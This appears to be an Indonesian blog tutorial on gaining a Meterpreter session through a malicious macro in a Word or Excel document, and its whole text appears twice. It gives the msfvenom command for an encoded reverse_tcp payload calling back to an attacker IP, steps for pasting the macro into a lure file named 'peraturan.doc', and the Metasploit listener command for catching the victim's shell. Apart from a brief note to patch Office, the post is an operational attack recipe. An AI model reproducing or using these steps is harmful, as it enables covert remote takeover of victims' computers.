Kali ini saya akan mencoba mendapatkan sessions meterpreter melalui MS. Office Word/Excel 2003/2007.
Ip Address Attacker : 192.168.1.5
Ip Address Korban : 192.168.1.8
Persiapan :
1. Buat shell code dengan msfvenom, dengan encoder x86/shikata_ga_nai
2. Copy exploit dan payload ke dalam MS. Office berekstensi .doc atau .docx
Baiklah pertama-tama kita akan membuat Code Macro nya dengan msfvenom :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=9999 -e shikata_ga_nai -i 3 -f vba > /root/vba.txt

Buka File vba.txt tadi dan kita akan mendapati 2 code :
MACRO CODE

PAYLOAD DATA

Selanjutnya kita akan memasukan exploit dan payload kedalam document, kemudian menunggu korban membukanya.
Buka file peraturan.doc dengan microsoft word, kemudian pilih tools -> macro -> visual basic editor.dan insert -> module
Buka file vba.txt kemudian copy macro code ke dalam visual basic auditor.

copy payload code ke lembar kerja:

Siapkan Metasploit Listener:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=9999 E

tunggu sampai korban membuka document tadi dan kita akan mendapatkan sessions meterpreter :)

Microsoft telah mengeluarkan Pacth/update so... update lah Office kalian :)
1. Buat shell code dengan msfvenom, dengan encoder x86/shikata_ga_nai
2. Copy exploit dan payload ke dalam MS. Office berekstensi .doc atau .docx
Baiklah pertama-tama kita akan membuat Code Macro nya dengan msfvenom :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=9999 -e shikata_ga_nai -i 3 -f vba > /root/vba.txt

Buka File vba.txt tadi dan kita akan mendapati 2 code :
MACRO CODE

PAYLOAD DATA

Selanjutnya kita akan memasukan exploit dan payload kedalam document, kemudian menunggu korban membukanya.
Buka file peraturan.doc dengan microsoft word, kemudian pilih tools -> macro -> visual basic editor.dan insert -> module
Buka file vba.txt kemudian copy macro code ke dalam visual basic auditor.

copy payload code ke lembar kerja:

Siapkan Metasploit Listener:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=9999 E

tunggu sampai korban membuka document tadi dan kita akan mendapatkan sessions meterpreter :)

Microsoft telah mengeluarkan Pacth/update so... update lah Office kalian :)
No comments:
Post a Comment